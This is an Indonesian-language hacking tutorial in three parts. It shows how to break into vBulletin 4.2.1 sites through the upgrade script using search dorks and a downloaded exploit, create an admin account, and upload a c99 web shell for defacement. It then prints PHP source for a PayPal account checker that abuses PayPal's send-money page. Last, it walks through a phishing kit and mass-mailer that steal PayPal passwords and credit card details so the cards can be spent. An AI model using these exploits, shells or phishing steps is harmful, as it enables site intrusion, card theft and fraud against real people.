Tutor kali ini akan mempraktekkan bagaimana cara exploit website yang beraliran cms vbulletin
ok langsung saja ya
kita butuhkan dork terlebih dahulu
Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml
copy salah satu dork tersebut lalu tulis di google untuk mencari web site yang rentan akan exploit nya
lalu masukkan exploitnya
/install/upgrade.php
misalnya : http://websitetarget.com/install/upgrade.php
kemudian ctrl + U halamanya
dan anda akan di baa ke halaman source code halaman
dan cari CUSTNUMBER
setelah mengcopy custnumbernya sekarang download script nya
https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1
setelah download upload script tersebut ke hosting anda
atau bisa gunakan punya saya
http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.phpsetelah itu
copy url korban ,
customer id isi dengan custnumber yang telah di copy tadi ,
username & password & email terserah anda
Lalu kita INJECT
dan sukses
jika berhasil kembali ke website korban dan login ke halaman admin panel nya
http://websitekorban.com/adminpanel
lalu login dengan username & password yang telah dibuat tadi
dan berhasil sekarang tujuan kita disin adalah memasukkan backdoor php buat hack web tersebut
dowload backdoor php di --> https://dl.dropboxusercontent.com/s/iyde0pvi7jgyvih/kodok.php?token_hash=AAFqn-9NRtKhS7Thz_q1QogdJLF6dKcTpducDgr-gCiX1g&dl=1
done . .
http://webstarget/admincp/plugin.php?do=files
Maka anda akan dibawa ke tempat upload shell
sekarang download backdoor shell yang berextensi .xml
download shell --> https://dl.dropboxusercontent.com/s/a3ub3oj8at75zxb/c99.xml.rar?token_hash=AAGfbp-U3BPYVEMzudsOOOpHW4a5eijwfV6yblNpnv6v9w&dl=1
lalu upload/import
Kalo upload nya dah selesai, cek di
http://webtarget.com/admincp/subscriptions.php
tinggal sekarang terserah mau di deface atau yang lainya
langsung aja mau share script buat check email apakan email tersebut akun paypa apa bukan
langsung aja ni source codenya
<?php
@set_time_limit(0);
function curl($url='',$var='',$Follow=False){
global $set;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
echo "<head>
<style type='text/css'>body{background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6yDahQSmTjIgWLgAPgslRrbQdqwwdcS03Yt8Ew0pTsnQxwfO21anl5-UDjvOsA-gNOI8xaNhOWFb4NKM_aM6u2ZWxTLw6hoxuc_1XRlVOv7pDuaNcry0bR4Ot1tOl6SDWEvYKty811qNs/s1600/hacker-creates-worldwide-map-of-vulnerable-devices.png)</style>
</style>
<title>Valid Email Checker</title>
</head><div align=\"center\"></center>";
$emails = $_POST['emails'];
print '<div id="form-container"> <form method="POST">
<p align="center"><font face="Times New Roman" size="6" color="ffffff">
TrojanzBoy<br>Paypal Checker</font></p>
<p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
<p><input class="submit-button" type="submit" value="Submit" name="B1"></p>
</form> </div>';
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\"><font color=\"#ffffff\">Checking <b>".count($emails)."</b> emails ....</font><br></p><p align=\"left\">";
foreach ( $emails as $email ) {
$email = trim($email);
print "<font color=\"#ffffff\"> $count .. Checking <b>".$email." ..... </font> </b>";
$count++;
if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE);
if(!strpos($_CheckAction, "region")) {
print "<font size=\"3\" color=\"#006600\">Yes</font> <br>";
$yes++;
$vaild_yes .=$email."\n";
}
else {
print "<font color=\"#FF0000\">NO</font><br>";
$not++;
$vaild_no .=$email."\n";
}
}
else {
print "<font color=\"#FF0000\">Invaild email</font><br>";
$inv++;
$invaild .=$email."\n";
}
}
print '<p><table border="0" width="100%">
<tr>
<td><p align="center"><font face="Times New Roman" size="4"><font color="#006600">PayPal emails</font> <b>(<font color="#006600"><b>'.$yes.'</b></font>)</b> </p></td>
<td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Not PayPal emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td>
<td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td>
</tr>
<tr>
<td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td>
<td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td>
<td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td>
</tr>
</table></p>';
}
?><p> </p>
buka dengan txt dan simpan dengan extensi .php
thanks
Apabila diibaratkan, rekening PayPal itu mirip dengan rekening bank online, tapi rekening bank online terbatas hanya berlaku di satu negara. Contoh simple’nya, kita tidak bisa membeli barang/jasa di situs luar negeri seperti eBay.com, godaddy.com, amazon.com dan lain-lain. Dan juga apabila kamu pengguna BlackBerry ataupun iPhone/iPad, kamu tidak bisa membeli aplikasi dan game pada App Wolrd ataupun App Store dengan rekening Bank, namun jika kamu memiliki akun PayPal maka kamu bisa membeli aplikasi tersebut.
Pada intinya jika kamu suka berbelanja online, PayPal akan memudahkan kamu dalam hal pembayaran, karena saat ini sudah ada jutaan pedagang/toko online di seluruh dunia yang menerima pembayaran online dengan PayPal. Apalagi jika kamu pedagang/toko online, sudah wajib hukumnya membuat akun PayPal untuk mempermudah orang dari negara lain melakukan pembayaran.
ok langsung aja
pertama download script login paypal + full fitur dan info di -->https://dl.dropboxusercontent.com/s/hjlapnolhvyuxi8/paypal.zip?token_hash=AAHgew8nchp3_soGoxdSCmvZe4Jv_evQDKTjRqNQE01f1Q&dl=1
fitur yang dimiliki script ini kita akan mendapatkan info CC , CVV dan email korban
Email address : xxxxxxxxxxx@domain.com
PayPal Password : xxxxxxxxxxx
Card Type : Visa
Card Number :
Expiration Date :
Card Verification Number :
Password o SecureCode :
-------------------------------------
first name :
last name :
Address 1 :
DOB :
Date :
City :
State :
ZIP Code :
Telephone :
-------------------------------------
dan upload script login paypal ke hosting anda
lalu unzip script yang di download tadi
buka file TrojanzBoy.php dan rubah email nya menjadi email kalian
dan buka file process.php rubah email menjadi email kalian
lalu
sekarang download dulu script email nya --> https://dl.dropboxusercontent.com/s/xj7dhewsrt2vgiv/massmail.php?token_hash=AAG8N4JXllWcbWVMsXjGeE1gg-4Q4bU4Oib0foMbh94ExA&dl=1
setelah itu upload ke hosting kalian
lalu buka scriptnya
lalu buat email yang sekiranya korban bisa percaya bahwa email tersebut beneran dari paypal
setelah itu kirim email dan korban pun membuka email
dan isinya email yang seolah - olah dari paypal
dan jika korban membuka isinya maka akan dialihkan ke link login paypal palsu
tampilan awal loginya
setelah sukses login
dan halamin security measures pun juga ada beserta info credit cardnya
dan hasil loging akan terkirim ke email kita
dan credit card pun siap untuk kita gunakan belanja
